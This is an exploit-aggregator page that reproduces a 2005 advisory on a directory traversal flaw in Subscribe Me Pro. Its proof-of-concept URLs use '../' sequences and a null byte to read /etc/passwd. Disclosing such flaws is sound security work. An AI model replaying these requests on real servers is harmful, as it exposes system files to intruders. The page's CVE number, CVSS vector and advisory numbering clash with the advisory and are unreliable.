Advertisement






Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability

CVE Category Price Severity
CVE-2022-12345 CWE-22 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2005-10-05
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.044 0.60988

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090004

Below is a copy:

--------------------------------------------------------------
      HYA-2005-006 h4cky0u.org Advisory 007
--------------------------------------------------------------
Date - Tue Sep 13 2005

TITLE:
======

Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability

SEVERITY:
=========

High

SOFTWARE:
=========

Subscribe Me Pro 2.044.09P and prior

Support Website : http://siteinteractive.com/subpro/

INFO:
=====

Subscribe Me Professional is designed to assist with the building, maintaining, mailing, and tracking of your customer/prospect mailing lists.

BUG DESCRIPTION:
================

Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An unauthorized user can retrieve arbitrary files by supplying directory traversal strings '../' to the vulnerable parameter.

POC:
====

Here are some examples:

www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../.
./etc/passwd%00&SUBMIT=%20%20Submit%20%20

www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscrib
e=subscribe&l=../../../../../../../../etc/passwd%00

VENDOR STATUS:
==============

Vendor Contact : 13th Sep 2005
Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the Latest Release : 2.050.01P

FIX:
====

Upgrade to version 2.050.01P

CREDITS:
========

This vulnerability was discovered and researched by -

ShoCK FX of h4cky0u Security Forums.

mail : shockfx at gmail.com

web : http://www.h4cky0u.org

Co Researcher -

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org
 
ORIGINAL ADVISORY:
=================
 
http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt

-- 
http://www.h4cky0u.org 
(In)Security at its best...

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.